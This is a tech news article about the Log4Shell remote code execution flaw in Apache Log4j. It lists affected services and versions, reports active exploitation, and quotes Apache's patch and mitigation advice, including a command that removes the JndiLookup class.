29.8 C
Jorhāt
Wednesday, August 27, 2025
type here...
Hacking News

Critical ‘Log4Shell’ Zero-Day Vulnerability Wreaks Havoc Online

By Neha Baruah
0
4

Must read

Neha Baruah
Neha Baruah
The self-proclaimed queen of words at "Ki Hikila." When she's not busy rearranging the alphabet to create "masterpieces," she's probably on her 17th cup of coffee, pretending that writer's block is a myth. Neha's been telling stories since she could talk (and hasn’t stopped since), and she’s convinced that her wit is sharper than her editing skills. If you're looking for tales sprinkled with sarcasm and a dash of "I could have written that better," Neha's your go-to author.
- Advertisement -

A highly critical vulnerability affecting the Apache Log4j library has potentially shaken the internet. This ‘Log4Shell’ vulnerability is already under attack and affects various services including Twitter, iCloud, Apple, and Minecraft.

‘Log4Shell’ Zero-Day Vulnerability Has A Wide Attack Surface

Researchers have shared insights about a critical Apache Log4j vulnerability that affects numerous services.

Identified as CVE-2021-44228, and informally named as ‘Log4shell’ by LunaSec, this vulnerability is a typical remote code execution flaw that affects the apps running this Java logging library.

As listed in a new GitHub repo, some of the affected services even include Apple, Amazon, Twitter, Tencent, Steam, Baidu, Cloudflare, Tesla, Ghidra, Google, WebEx, LinkedIn, and more. Whereas, the vulnerability was first caught affecting Minecraft.

According to the official description of this vulnerability from Apache, it’s an RCE flaw that allows an attacker to take control of the target servers. As stated,

Apache Log4j2

Apache has confirmed that this vulnerability impacts Log4j 2 versions from 2.0-beta9 to 2.14.1.

Apache Deployed The Patches

Regrettably, New Zealand CERT has admitted in an advisory that the bug is already under attack in the wild.

Hence, it is imperative for the users to ensure receiving the latest Log4j version to get the patches. The US CERT has also urged on these updates in their recent advisory.

Specifically, Apache has released Log4j version 2.15.0, addressing this vulnerability. Also, they have shared a mitigation for this bug in their advisory that reads,

In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

Hence, given the active exploitation of the bug and the availability of PoC exploits on Twitter and GitHub, users must rush to update.

Let us know your thoughts in the comments.

ApacheApache Log4jApache Log4j vulnerabilityApache Log4j zero-dayApache Log4j2Apache vulnerabilitybugflawjavaJava logging libraryMinecraftremote coderemote code executionSteamtwittervulnerabilityZero Dayzero day vulnerabilityZero-Day Flawzeroday

Total
0
Shares
Share 0
Tweet 0
Pin it 0
Share 0
- Advertisement -
Previous article
Zoom Launches Auto-Update Feature For Windows And Mac Clients
Next article
Multiple Vulnerabilities Found In GoAutoDial Call Center Software
- Advertisement -

More articles

- Advertisement -

Latest article

© Ki Hikila, by Alt-F-Artist PVT LTD. All rights reserved.

Important Tools

About Us

Popular Category

Editor Picks